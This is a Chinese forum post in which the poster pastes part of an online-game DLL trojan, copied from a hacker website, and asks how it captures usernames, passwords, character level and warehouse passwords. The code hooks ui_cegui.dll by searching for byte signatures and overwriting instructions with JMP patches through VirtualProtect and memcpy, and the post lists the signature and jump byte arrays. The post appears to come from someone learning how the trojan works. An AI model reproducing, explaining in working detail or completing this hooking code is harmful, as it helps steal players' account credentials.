调试易

stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui); 
if(stroePath==0) 
return ; 
stroePath=stroePath+0x43; 
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43); 
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5); 
*(DWORD*)(&storeJmpCode[1])=jmpAddress; 
memcpy(oldStoreCode,(BYTE*)stroePath,6);MEMORY_BASIC_INFORMATION mbi; 
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); 
memcpy((void*)stroePath,storeJmpCode,6); 
VirtualProtect((void*)stroePath,7,mbi.Protect,0); 
return;
这个是完整版帖子地址http://www.hacker.com.cn/article/view_14638.html这个是我问网上找的一篇网游DLL木马的代码
有几个问题不是很明白他这个里面的他这个里面的获取
截取了用户名，密码，等级，仓库密码 的代码都差不多！他是怎么获取到的呢？
这个很郁闷！不知道谁能帮忙说一下下！！
另外就是他的ui_cegui.dll 和下面的这些二进制东西怎么得到的？
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C}; 
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00}; 
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08}; 
BYTE oldStoreCode[6]={0}; 
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; 
谢谢晚上看来帖，若有哪位大牛讲解第详细点儿，立马结贴